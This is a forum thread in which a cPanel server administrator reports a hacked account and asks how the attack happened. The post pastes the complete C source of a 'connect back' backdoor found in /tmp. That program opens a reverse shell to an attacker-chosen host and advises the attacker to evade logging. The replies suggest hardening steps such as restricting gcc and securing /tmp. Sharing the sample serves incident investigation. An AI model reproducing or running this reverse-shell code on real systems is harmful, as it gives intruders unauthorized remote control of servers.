The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

One account hacked through /tmp

Discussion in 'General Discussion' started by elleryjh, Jan 31, 2004.

  1. elleryjh

    elleryjh Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    479
    Likes Received:
    0
    Trophy Points:
    16
    One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other visible. The user is not likely to have done the exploit.

    phpsuexec, suexec and php_basedir are all enabled.

    No FTP activty for that account was listed in /var/log/messages.

    No processes are running by that user.



    Does anybody know how this attack was carried out, and where to look for more evidence?

    /tmp is mounted as noexec, and
    root@server [/tmp]# /scripts/securetmp
    /tmp is already secure
    /var/tmp is already secure
    Process Complete

    However, looks like this file was compiled and run... This file and it's binary was in /tmp, owned by that user:
    root@server [/tmp]# more dc-connectback.c
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    int main(int argc, char **argv) {
    char *host;
    int port = 80;
    int f;
    int l;
    int sock;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;
    char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
    "Issue \"export TERM=xterm; exec bash -i\"\n"
    "For More Reliable Shell.\n"
    "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
    "For Not Getting Logged.\n(;\n\n";
    printf("Data Cha0s Connect Back Backdoor\n\n");
    if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
    }
    printf("[*] Dumping Arguments\n");
    l = strlen(argv[1]);
    if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
    }
    if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
    }
    strncpy(host, argv[1], l);
    if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
    printf("[-] Invalid Port Number\n");
    return 1;
    }
    }
    printf("[*] Resolving Host Name\n");
    he = gethostbyname(host);
    if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
    } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = ia.s_addr;
    sin.sin_port = htons(port);
    printf("[*] Connecting...\n");
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
    }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
    }
    printf("[*] Spawning Shell\n");
    f = fork( );
    if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
    } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
    }
    printf("[*] Detached\n\n");
    return 0;
    }
     
  2. Stenny Chong

    Stenny Chong Well-Known Member

    Joined:
    Jun 12, 2002
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    I suggest you do the following to secure or disallow other user compiling program.

    chmod 700 /usr/bin/gcc.
     
  3. kris1351

    kris1351 Well-Known Member

    Joined:
    Apr 18, 2003
    Messages:
    963
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lewisville, Tx
    Definately need to run /scripts/securetmp

    This will make it so no compiling or executions can happen in tmp. Like Stenny said also make gcc non-executable. You can change it when you need to compile very easily.
     
Loading...

Share This Page